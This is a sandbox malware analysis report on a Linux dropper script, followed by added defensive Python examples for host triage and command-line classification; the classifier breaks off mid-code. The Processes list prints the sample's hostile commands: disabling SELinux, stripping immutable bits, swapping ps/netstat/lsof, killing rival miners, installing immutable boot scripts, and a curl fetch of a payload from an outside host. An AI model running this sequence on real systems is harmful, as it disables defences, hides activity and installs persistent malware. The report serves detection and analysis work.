Malware Analysis Report

2024-12-07 16:23

Sample ID 241113-3bxq7a1ejb
Target HMtWYpJGZVUZkrQK.sh
SHA256 3e676ba390fe4cd218577761efacd4ef39eedfb1014832e63aa8e1b32614773b
Tags
defense_evasion discovery persistence antivm privilege_escalation
score
7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
7/10

SHA256

3e676ba390fe4cd218577761efacd4ef39eedfb1014832e63aa8e1b32614773b

Threat Level: Shows suspicious behavior

The file HMtWYpJGZVUZkrQK.sh shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery persistence antivm privilege_escalation

Executes dropped EXE

File and Directory Permissions Modification

Enumerates running processes

Write file to user bin folder

Attempts to change immutable files

Disables SELinux

Modifies init.d

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Checks CPU configuration

Reads CPU attributes

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 23:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

128s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Note: the /etc/init.d/sedXXXXXX entries below are the temporary files GNU sed creates next to each target when run with -i (one per init script edited by the sed commands listed under Processes). The sample's own persistence scripts are /etc/init.d/selinux and /etc/init.d/crontabs, which it writes itself and then marks executable and immutable.
Description Indicator Process Target
File opened for modification /etc/init.d/sed4AVVs6 /bin/sed N/A
File opened for modification /etc/init.d/sed95Ns9Y /bin/sed N/A
File opened for modification /etc/init.d/sedivgDd0 /bin/sed N/A
File opened for modification /etc/init.d/sedUHt3QU /bin/sed N/A
File opened for modification /etc/init.d/sedf0ume1 /bin/sed N/A
File opened for modification /etc/init.d/sedFhHFT5 /bin/sed N/A
File opened for modification /etc/init.d/sedxP3LUa /bin/sed N/A
File opened for modification /etc/init.d/sedZQsazd /bin/sed N/A
File opened for modification /etc/init.d/sedy6LbFS /bin/sed N/A
File opened for modification /etc/init.d/sedjEUNSW /bin/sed N/A
File opened for modification /etc/init.d/seduODJR1 /bin/sed N/A
File opened for modification /etc/init.d/sedPHaP3Z /bin/sed N/A
File opened for modification /etc/init.d/sedHcZzv2 /bin/sed N/A
File opened for modification /etc/init.d/sedqSWgm6 /bin/sed N/A
File opened for modification /etc/init.d/sed6ZnCQ4 /bin/sed N/A
File opened for modification /etc/init.d/sedhV0UxX /bin/sed N/A
File opened for modification /etc/init.d/sed2Wb2GX /bin/sed N/A
File opened for modification /etc/init.d/sedniYnE7 /bin/sed N/A
File opened for modification /etc/init.d/sed6AQ9Lb /bin/sed N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedzJUsG1 /bin/sed N/A
File opened for modification /etc/init.d/sedItU9o3 /bin/sed N/A
File opened for modification /etc/init.d/sedVHPgf6 /bin/sed N/A
File opened for modification /etc/init.d/sedSqez28 /bin/sed N/A
File opened for modification /etc/init.d/sedpoTtb8 /bin/sed N/A
File opened for modification /etc/init.d/sedpxfBNa /bin/sed N/A
File opened for modification /etc/init.d/sedkz6RZ9 /bin/sed N/A
File opened for modification /etc/init.d/sedQvKbJd /bin/sed N/A
File opened for modification /etc/init.d/sed9ofuDY /bin/sed N/A
File opened for modification /etc/init.d/sedIOKVd3 /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sed9jkXc4 /bin/sed N/A
File opened for modification /etc/init.d/sed7uNT72 /bin/sed N/A
File opened for modification /etc/init.d/sedBeMLr8 /bin/sed N/A
File opened for modification /etc/init.d/sedWFScV8 /bin/sed N/A
File opened for modification /etc/init.d/sedAxh40X /bin/sed N/A
File opened for modification /etc/init.d/seduA5xv0 /bin/sed N/A
File opened for modification /etc/init.d/sedHZKD74 /bin/sed N/A
File opened for modification /etc/init.d/sedEGBpj7 /bin/sed N/A
File opened for modification /etc/init.d/sedAPrblb /bin/sed N/A
File opened for modification /etc/init.d/sed0GUKie /bin/sed N/A
File opened for modification /etc/init.d/sedDFOGpV /bin/sed N/A
File opened for modification /etc/init.d/sedWoCetZ /bin/sed N/A
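
To check a live host or a mounted image for the persistence this table and the Processes list describe (the two init scripts, their S99selinux/S90crontabs links in rc2-5.d, the immutable bit, and the /usr/local/sbin/mcron, /usr/bin/dpkgd and /usr/bin/bsd-port paths), the following added example, which is not part of the report or of the sample, walks a root directory and lists what it finds. It assumes lsattr from e2fsprogs for the immutable check and reports "None" without it; build_fake_root() constructs a throwaway tree mirroring what behavioral1 left behind so the scan can be exercised without an infected machine.

```python
"""Host triage for the persistence artifacts behavioral1 leaves behind.

Added example, not part of the sandbox report. Every path checked here appears
in the report's Processes list; `root` lets the scan run against a mounted
image, and build_fake_root() constructs a throwaway tree for a dry run.
"""
import os
import shutil
import subprocess
import tempfile
from pathlib import Path

INIT_SCRIPTS = ("selinux", "crontabs")                       # chmod 755 + chattr +ia targets
DROP_PATHS = ("usr/local/sbin/mcron", "usr/bin/dpkgd", "usr/bin/bsd-port")


def immutable_flag(path):
    """True/False for the ext 'i' attribute; None if lsattr is missing or the fs has no attributes."""
    if shutil.which("lsattr") is None:
        return None
    r = subprocess.run(["lsattr", "-d", str(path)], capture_output=True, text=True)
    fields = r.stdout.split()
    if r.returncode != 0 or not fields:
        return None
    return "i" in fields[0]


def scan(root="/"):
    """Return (kind, path, detail) findings; an empty list means none of the artifacts are present."""
    root = Path(root)
    found = []
    initd = root / "etc/init.d"
    for name in INIT_SCRIPTS:
        p = initd / name
        if p.exists():
            found.append(("init_script", str(p), f"immutable={immutable_flag(p)}"))
    # Package-managed init scripts never carry +i, so the bit alone is a finding whatever the name.
    if initd.is_dir():
        for p in sorted(initd.iterdir()):
            if p.name not in INIT_SCRIPTS and immutable_flag(p):
                found.append(("immutable_init_script", str(p), "chattr +i set"))
    # S99selinux / S90crontabs style links that point back at the two scripts.
    for level in "2345":
        rcdir = root / f"etc/rc{level}.d"
        if not rcdir.is_dir():
            continue
        for link in sorted(rcdir.iterdir()):
            if link.is_symlink():
                target = os.readlink(link)
                if target.startswith("/etc/init.d/") and Path(target).name in INIT_SCRIPTS:
                    found.append(("rc_link", str(link), f"-> {target}"))
    for rel in DROP_PATHS:
        p = root / rel
        if p.exists() or p.is_symlink():
            found.append(("dropped_path", str(p), "dir" if p.is_dir() else "file"))
    return found


def build_fake_root():
    """Constructed tree mirroring what behavioral1 left: two scripts, four rc links, mcron, dpkgd."""
    root = Path(tempfile.mkdtemp(prefix="triage-"))
    (root / "etc/init.d").mkdir(parents=True)
    for name in INIT_SCRIPTS:
        (root / "etc/init.d" / name).write_text("#!/bin/sh\n# constructed placeholder\n")
    for level in "23":
        rcdir = root / f"etc/rc{level}.d"
        rcdir.mkdir()
        os.symlink("/etc/init.d/selinux", rcdir / "S99selinux")
        os.symlink("/etc/init.d/crontabs", rcdir / "S90crontabs")
    (root / "usr/local/sbin").mkdir(parents=True)
    (root / "usr/local/sbin/mcron").write_bytes(b"\x7fELF constructed stub")
    (root / "usr/bin/dpkgd").mkdir(parents=True)
    return root


if __name__ == "__main__":
    for kind, path, detail in scan("/"):
        print(f"{kind:22} {path}  {detail}")
```

Run it as root on the suspect host (lsattr needs no privilege, but reading every rc directory may); an "immutable_init_script" hit on any name is worth a look on its own, since this sample is not the only one that uses chattr +i to protect its boot hook.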

Reads CPU attributes

discovery
The /sys/devices/system/cpu/online reads are made by pkill itself at start-up (the C library's CPU-count lookup reads this file), once per pkill invocation: 16 rows here, 16 pkill commands under Processes. No command line in this run performs an explicit VM or CPU check.
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
The /proc/<pid>/status and /proc/<pid>/cmdline reads are pkill walking the process table to match the names it was given (see the pkill commands under Processes); /proc/filesystems is read by mount.
Description Indicator Process Target
File opened for reading /proc/1489/status /usr/bin/pkill N/A
File opened for reading /proc/1045/status /usr/bin/pkill N/A
File opened for reading /proc/458/cmdline /usr/bin/pkill N/A
File opened for reading /proc/755/status /usr/bin/pkill N/A
File opened for reading /proc/311/cmdline /usr/bin/pkill N/A
File opened for reading /proc/26/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1145/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1283/cmdline /usr/bin/pkill N/A
File opened for reading /proc/511/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1155/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1491/status /usr/bin/pkill N/A
File opened for reading /proc/1078/status /usr/bin/pkill N/A
File opened for reading /proc/406/cmdline /usr/bin/pkill N/A
File opened for reading /proc/404/status /usr/bin/pkill N/A
File opened for reading /proc/168/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1489/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1364/cmdline /usr/bin/pkill N/A
File opened for reading /proc/159/status /usr/bin/pkill N/A
File opened for reading /proc/425/cmdline /usr/bin/pkill N/A
File opened for reading /proc/408/status /usr/bin/pkill N/A
File opened for reading /proc/159/cmdline /usr/bin/pkill N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/902/status /usr/bin/pkill N/A
File opened for reading /proc/83/status /usr/bin/pkill N/A
File opened for reading /proc/1117/cmdline /usr/bin/pkill N/A
File opened for reading /proc/25/cmdline /usr/bin/pkill N/A
File opened for reading /proc/598/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1134/status /usr/bin/pkill N/A
File opened for reading /proc/1270/status /usr/bin/pkill N/A
File opened for reading /proc/1364/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/978/status /usr/bin/pkill N/A
File opened for reading /proc/1059/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /bin/mount N/A
File opened for reading /proc/311/status /usr/bin/pkill N/A
File opened for reading /proc/137/status /usr/bin/pkill N/A
File opened for reading /proc/858/status /usr/bin/pkill N/A
File opened for reading /proc/436/status /usr/bin/pkill N/A
File opened for reading /proc/168/cmdline /usr/bin/pkill N/A
File opened for reading /proc/970/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1140/status /usr/bin/pkill N/A
File opened for reading /proc/162/status /usr/bin/pkill N/A
File opened for reading /proc/1306/status /usr/bin/pkill N/A
File opened for reading /proc/672/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1160/status /usr/bin/pkill N/A
File opened for reading /proc/315/status /usr/bin/pkill N/A
File opened for reading /proc/13/cmdline /usr/bin/pkill N/A
File opened for reading /proc/159/status /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/1117/status /usr/bin/pkill N/A
File opened for reading /proc/446/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/1118/status /usr/bin/pkill N/A
File opened for reading /proc/98/status /usr/bin/pkill N/A
File opened for reading /proc/776/status /usr/bin/pkill N/A
File opened for reading /proc/1127/cmdline /usr/bin/pkill N/A
File opened for reading /proc/157/status /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A
File opened for reading /proc/568/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/1092/cmdline /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.BubyqF /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.yJP6CF /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin/lsof]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/acpid]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/anacron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apparmor]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apport]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/avahi-daemon]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/bluetooth]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups-browsed]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dns-clean]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/gdm3]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/grub-common]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/irqbalance]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kerneloops]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/network-manager]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth-log]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/pppd-dns]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsync]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/saned]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/speech-dispatcher]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/spice-vdagent]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ufw]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/unattended-upgrades]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/uuidd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/whoopsie]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/usr/bin/sort

[sort -u]

/bin/grep

[grep -o /proc/[0-9]\+]

/bin/mount

[mount]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
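
Read top to bottom, the command lines above form one procedure: disable SELinux, strip the immutable and append-only bits, put ps, netstat and lsof back from /usr/bin/dpkgd, delete lines naming other miners from /etc/crontab and every init script, kill a list of process names, then install two immutable init scripts, link them into rc2-5.d and fetch a payload into /usr/local/sbin. The block below is an added example, not part of the report or of the sample: a small rule set that turns command lines of this shape (from auditd EXECVE records, a sandbox process list or an EDR feed) into the report's own tactic tags. The SAMPLE list is constructed by copying lines from the Processes list; rule names that are not report signature names, the SYSBINS and BIN_DIRS sets and the rc-link regex are this example's assumptions.

```python
"""Rule-based triage of Linux process command lines.

Added example, not part of the sandbox report. The SAMPLE records are
constructed by copying command lines from the behavioral1 Processes list.
Rule names reuse the report's signature names where one fits; the others
("Replaces system binary", "Removes rc.d links", "Locks its own files
immutable", "Edits init scripts/crontab in place") are this example's labels.
"""
import re
import shlex
from collections import Counter

# Binaries an intruder swaps out to hide processes and sockets from an operator.
SYSBINS = {"/bin/ps", "/usr/bin/ps", "/bin/netstat", "/usr/bin/netstat",
           "/usr/bin/lsof", "/usr/sbin/lsof", "/usr/bin/top", "/bin/ss", "/usr/bin/ss"}
BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/", "/usr/local/sbin/")
RC_LINK = re.compile(r"^/etc/rc[0-6S]\.d/[SK]\d\d")


def _base(argv):
    return argv[0].rsplit("/", 1)[-1]


def _flag_values(argv, flag):
    """Values that follow every occurrence of `flag`, e.g. the target of curl -o."""
    return [argv[i + 1] for i, a in enumerate(argv[:-1]) if a == flag]


# (tactic, rule name, predicate over argv). Tactic labels are the report's own tags.
RULES = [
    ("defense_evasion", "Disables SELinux",
     lambda a: _base(a) == "setenforce" and a[1:] in (["0"], ["permissive"], ["Permissive"])),
    ("defense_evasion", "Attempts to change immutable files",
     lambda a: _base(a) == "chattr" and any(x.startswith("-") and ("i" in x or "a" in x) for x in a[1:])),
    ("persistence", "Locks its own files immutable",
     lambda a: _base(a) == "chattr" and any(x.startswith("+") and "i" in x for x in a[1:])),
    ("defense_evasion", "Replaces system binary",
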